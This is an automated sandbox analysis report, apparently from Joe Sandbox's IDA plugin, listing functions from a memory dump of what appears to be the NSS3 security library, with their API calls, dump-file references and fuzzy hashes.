Part of subcall function 6CB01200: PR_CallOnce.NSS3(6CC02AA4,6CB012D0,00000000,00000000,00000000,?,6CAA88A4,00000000,00000000), ref: 6CB0125D
Part of subcall function 6CB01200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CB0126F
Part of subcall function 6CB01200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CB01280
Part of subcall function 6CB01200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CB0128E
Part of subcall function 6CB01200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CB0129A
Part of subcall function 6CB01200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CB012A1

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: 5973971976b42138785315c8ce6a84bfe0d190850679b60bfb27ad8ac8bfde3e
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: F921F972E543C54BEB00CF549D447AA3764AF9234CF150269ED085BB52F7B1D6948293

Function 6CACACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6CACACC2

Part of subcall function 6CAA2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CAA2F0A
Part of subcall function 6CAA2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CAA2F1D

Part of subcall function 6CAA2AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CAA0A1B,00000000), ref: 6CAA2AF0
Part of subcall function 6CAA2AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAA2B11

CERT_DestroyCertList.NSS3(00000000), ref: 6CACAD5E

Part of subcall function 6CAE57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CAAB41E,00000000,00000000,?,00000000,?,6CAAB41E,00000000,00000000,00000001,?), ref: 6CAE57E0
Part of subcall function 6CAE57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CAE5843

CERT_DestroyCertList.NSS3(?), ref: 6CACAD36

Part of subcall function 6CAA2F50: CERT_DestroyCertificate.NSS3(?), ref: 6CAA2F65
Part of subcall function 6CAA2F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CAA2F83

free.MOZGLUE(?), ref: 6CACAD4F

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 45a150ce0d14fc9da95263f545b87c31f5126cfe4943623b386c14242747c0a5
Instruction ID: c6b1008bea98e683934870b344812744ed64676663646b4ff2727a22707febc1
Opcode Fuzzy Hash: 45a150ce0d14fc9da95263f545b87c31f5126cfe4943623b386c14242747c0a5
Instruction Fuzzy Hash: E221C6B5E001148BEF11DFA5D9055EE77B5AF09308F054568D809B7B00FB31AEA9CBE2

Function 6CAF3C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CAF3C9E
EnterCriticalSection.KERNEL32(?), ref: 6CAF3CAE
PR_Unlock.NSS3(?), ref: 6CAF3CEA
PR_SetError.NSS3(00000000,00000000), ref: 6CAF3D02

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: f1a7f567ab0286b136e2ded68d12ace031d4892d4d5dd380e14e31a62ceeeafa
Instruction ID: d04666d5914ad699f0374b90c646c3f95a26206348e439266afb0ab69b8028b0
Opcode Fuzzy Hash: f1a7f567ab0286b136e2ded68d12ace031d4892d4d5dd380e14e31a62ceeeafa
Instruction Fuzzy Hash: 3111D679A012049FDB00EF24DC44A9A3778EF09368F198464FD5897712D731ED96C7E1

Function 6CAFECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6CAFF0AD,6CAFF150,?,6CAFF150,?,?,?), ref: 6CAFECBA

Part of subcall function 6CB00FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CAA87ED,00000800,6CA9EF74,00000000), ref: 6CB01000
Part of subcall function 6CB00FF0: PR_NewLock.NSS3(?,00000800,6CA9EF74,00000000), ref: 6CB01016
Part of subcall function 6CB00FF0: PL_InitArenaPool.NSS3(00000000,security,6CAA87ED,00000008,?,00000800,6CA9EF74,00000000), ref: 6CB0102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6CAFECD1

Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB010F3
Part of subcall function 6CB010C0: EnterCriticalSection.KERNEL32(?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0110C
Part of subcall function 6CB010C0: PL_ArenaAllocate.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01141
Part of subcall function 6CB010C0: PR_Unlock.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01182
Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6CAFED02

Part of subcall function 6CB010C0: PL_ArenaAllocate.NSS3(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6CAFED5A

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: db5765c2b06447dcfdecbe22bf828f60b861366da5616f144df7357dafa1b685
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: 4421D4B1A007829BE700CF25D944B56BBE5BFA4348F19C216F81C87A62FB70E5D5C6E0

Function 6CB2EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6CB17FFA,?,6CB19767,?,8B7874C0,0000A48E), ref: 6CB2EDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6CB17FFA,?,6CB19767,?,8B7874C0,0000A48E), ref: 6CB2EDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6CB17FFA,?,6CB19767,?,8B7874C0,0000A48E), ref: 6CB2EE14

Part of subcall function 6CB00BE0: malloc.MOZGLUE(6CAF8D2D,?,00000000,?), ref: 6CB00BF8
Part of subcall function 6CB00BE0: TlsGetValue.KERNEL32(6CAF8D2D,?,00000000,?), ref: 6CB00C15

memcpy.VCRUNTIME140(?,?,6CB19767,00000000,00000000,6CB17FFA,?,6CB19767,?,8B7874C0,0000A48E), ref: 6CB2EE33

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: 5832781193374347ad3260508cb6f77074e975b90ffe8da7c35dca0546bb8238
Instruction ID: b948cf6a3466b75c61bcab48cec43aff567fa58f94f6ab61e1150ff3511097b5
Opcode Fuzzy Hash: 5832781193374347ad3260508cb6f77074e975b90ffe8da7c35dca0546bb8238
Instruction Fuzzy Hash: 8D11CA71A007D6ABDB50AE76DC84B5A73A8EF0435EF144531E91D96A00E335F454C7E2

Function 6CAADFA0 Relevance: 6.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6CAC06A0: TlsGetValue.KERNEL32 ref: 6CAC06C2
Part of subcall function 6CAC06A0: EnterCriticalSection.KERNEL32(?), ref: 6CAC06D6
Part of subcall function 6CAC06A0: PR_Unlock.NSS3 ref: 6CAC06EB

CERT_NewCertList.NSS3 ref: 6CAADFBF
CERT_AddCertToListTail.NSS3(00000000,?), ref: 6CAADFDB
CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6CAADFFA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAAE029

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Cert$List$CriticalEnterErrorFindIssuerSectionTailUnlockValue
String ID:
API String ID: 3183882470-0
Opcode ID: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
Instruction ID: 9827c6180e83ec67444ca3e2bd252afba71ff675d8d40a758b15b3d3c2fb028b
Opcode Fuzzy Hash: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
Instruction Fuzzy Hash: AD112F71A442066BDB111EEA5C44BAF7578AB4435CF080534ED58D7B00F772C97796E1

Function 6CAC8DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CAC8DE7
EnterCriticalSection.KERNEL32 ref: 6CAC8DFC
PR_Unlock.NSS3 ref: 6CAC8E2D
PR_SetError.NSS3 ref: 6CAC8E49

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: a3d5f59237ddac116e075fef244f5ab4066bd9a78b783a6efe11b0dee5816585
Instruction ID: 98448de2a51a0a76a6de4de08006b2035df2c29416cddc3e7dd8dee7ce5615f6
Opcode Fuzzy Hash: a3d5f59237ddac116e075fef244f5ab4066bd9a78b783a6efe11b0dee5816585
Instruction Fuzzy Hash: 00115E75609A149FDB00AF78D5886AABBF4FF05754F054969DC88D7B00EB30E894CBD2

Function 6CB4AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6CB35F17,?,?,?,?,?,?,?,?,6CB3AAD4), ref: 6CB4AC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6CB35F17,?,?,?,?,?,?,?,?,6CB3AAD4), ref: 6CB4ACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6CB3AAD4), ref: 6CB4ACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6CB3AAD4), ref: 6CB4ACDB

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 3f308579d628177cbead8c6e730182cf620414e515dea1d10fd71525063cd6e8
Instruction ID: e2ff530ce17d2694de620d55f29d3b825f99cebb0d3413aeea363e079114f4fa
Opcode Fuzzy Hash: 3f308579d628177cbead8c6e730182cf620414e515dea1d10fd71525063cd6e8
Instruction Fuzzy Hash: FF0129B1601B419BEB60DF29E908753B7E8FB04699B108839D85AC3E15E731F468CB91

Function 6CAB1DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

CERT_DestroyCertificate.NSS3(?), ref: 6CAB1DFB

Part of subcall function 6CAA95B0: TlsGetValue.KERNEL32(00000000,?,6CAC00D2,00000000), ref: 6CAA95D2
Part of subcall function 6CAA95B0: EnterCriticalSection.KERNEL32(?,?,?,6CAC00D2,00000000), ref: 6CAA95E7
Part of subcall function 6CAA95B0: PR_Unlock.NSS3(?,?,?,?,6CAC00D2,00000000), ref: 6CAA9605

PR_EnterMonitor.NSS3 ref: 6CAB1E09

Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB690AB
Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB690C9
Part of subcall function 6CB69090: EnterCriticalSection.KERNEL32 ref: 6CB690E5
Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB69116
Part of subcall function 6CB69090: LeaveCriticalSection.KERNEL32 ref: 6CB6913F

Part of subcall function 6CAAE190: PR_EnterMonitor.NSS3(?,?,6CAAE175), ref: 6CAAE19C
Part of subcall function 6CAAE190: PR_EnterMonitor.NSS3(6CAAE175), ref: 6CAAE1AA
Part of subcall function 6CAAE190: PR_ExitMonitor.NSS3 ref: 6CAAE208
Part of subcall function 6CAAE190: PL_HashTableRemove.NSS3(?), ref: 6CAAE219
Part of subcall function 6CAAE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CAAE231
Part of subcall function 6CAAE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CAAE249
Part of subcall function 6CAAE190: PR_ExitMonitor.NSS3 ref: 6CAAE257

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAB1E37
PR_ExitMonitor.NSS3 ref: 6CAB1E4A

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
String ID:
API String ID: 499896158-0
Opcode ID: f01817ae6efae2bb1830f515332c4de5753dda3c4d68e45e60cf04d4ed4da961
Instruction ID: c5caa0bee6e641c3b70bd014a0e99924a75fbead775956b76e0b2edb2c14ed05
Opcode Fuzzy Hash: f01817ae6efae2bb1830f515332c4de5753dda3c4d68e45e60cf04d4ed4da961
Instruction Fuzzy Hash: FE01D471B0015097EA004B65EC00F7677B8AB41B4CF260034F618A7B90E732E858CBD1

Function 6CAB1D50 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAB1D75
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CAB1D89
PORT_ZAlloc_Util.NSS3(00000010), ref: 6CAB1D9C
free.MOZGLUE(00000000), ref: 6CAB1DB8

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Alloc_Util$Errorfree
String ID:
API String ID: 939066016-0
Opcode ID: 07edd9f6a3c8fca76f3ce9c8aa9861e6880769689f5d0dc4d6c73f8376e7de92
Instruction ID: 0de7fdc2eed50ff183bd3fa01ab662dfb73f1e5a5b3ed7b73081ac08f0f78989
Opcode Fuzzy Hash: 07edd9f6a3c8fca76f3ce9c8aa9861e6880769689f5d0dc4d6c73f8376e7de92
Instruction Fuzzy Hash: DCF0F9B260125057FF101E596C81B677B5CEF81B98F140635DF1D67B44D671E48482E1

Function 6CB4AC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,6CB35D40,00000000,?,?,6CB26AC6,6CB3639C), ref: 6CB4AC2D

Part of subcall function 6CAEADC0: TlsGetValue.KERNEL32(?,6CACCDBB,?,6CACD079,00000000,00000001), ref: 6CAEAE10
Part of subcall function 6CAEADC0: EnterCriticalSection.KERNEL32(?,?,6CACCDBB,?,6CACD079,00000000,00000001), ref: 6CAEAE24
Part of subcall function 6CAEADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CACD079,00000000,00000001), ref: 6CAEAE5A
Part of subcall function 6CAEADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CACCDBB,?,6CACD079,00000000,00000001), ref: 6CAEAE6F
Part of subcall function 6CAEADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CACCDBB,?,6CACD079,00000000,00000001), ref: 6CAEAE7F
Part of subcall function 6CAEADC0: TlsGetValue.KERNEL32(?,6CACCDBB,?,6CACD079,00000000,00000001), ref: 6CAEAEB1
Part of subcall function 6CAEADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CACCDBB,?,6CACD079,00000000,00000001), ref: 6CAEAEC9

PK11_FreeSymKey.NSS3(?,6CB35D40,00000000,?,?,6CB26AC6,6CB3639C), ref: 6CB4AC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6CB35D40,00000000,?,?,6CB26AC6,6CB3639C), ref: 6CB4AC59
free.MOZGLUE(8CB6FF01,6CB26AC6,6CB3639C,?,?,?,?,?,?,?,?,?,6CB35D40,00000000,?,6CB3AAD4), ref: 6CB4AC62

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID:
API String ID: 1595327144-0
Opcode ID: 90127d0fe09bf794e20b5e7838ea913365624daaf6fe3e1d9d2f3a857c31ef11
Instruction ID: d73579e2699a8ecc819ea4a95102fc0092f5e4d227ba6bc0b57d74920c769a9b
Opcode Fuzzy Hash: 90127d0fe09bf794e20b5e7838ea913365624daaf6fe3e1d9d2f3a857c31ef11
Instruction Fuzzy Hash: 7B014FB56042049FDB10DF15EDC0B567BA8EF44B58F18C068E9498F70AD731E858CFA2

Function 6CAFFD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CAA9003,?), ref: 6CAFFD91

Part of subcall function 6CB00BE0: malloc.MOZGLUE(6CAF8D2D,?,00000000,?), ref: 6CB00BF8
Part of subcall function 6CB00BE0: TlsGetValue.KERNEL32(6CAF8D2D,?,00000000,?), ref: 6CB00C15

PORT_Alloc_Util.NSS3(A4686CB0,?), ref: 6CAFFDA2
memcpy.VCRUNTIME140(00000000,12D068C3,A4686CB0,?,?), ref: 6CAFFDC4
free.MOZGLUE(00000000,?,?), ref: 6CAFFDD1

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Alloc_Util$Valuefreemallocmemcpy
String ID:
API String ID: 2335489644-0
Opcode ID: 1805ca4637912cec3a429dce49dbd996e90665792402be551112ae46bdd636dd
Instruction ID: 033d72052d639088e065230dd47e985598b24f5f230e433b0785bda267f90b5e
Opcode Fuzzy Hash: 1805ca4637912cec3a429dce49dbd996e90665792402be551112ae46bdd636dd
Instruction Fuzzy Hash: 36F0C8B16022425BEB045F55EC8092B7B98EF5439DB148078FD298BB01E771D855C7F1

Function 6CBBCC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6CBBCC61
free.MOZGLUE ref: 6CBBCC6E
DeleteCriticalSection.KERNEL32(?), ref: 6CBBCC80
free.MOZGLUE(?), ref: 6CBBCC87

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: f52f26bc4a15a9c67a58cfe5e36c318eee968df652a7c0ae59a974cfc133a275
Instruction ID: 71af7ae7d34aeef5a7671384454c9b6388956efd9bef5788dc9ab81bcc965875
Opcode Fuzzy Hash: f52f26bc4a15a9c67a58cfe5e36c318eee968df652a7c0ae59a974cfc133a275
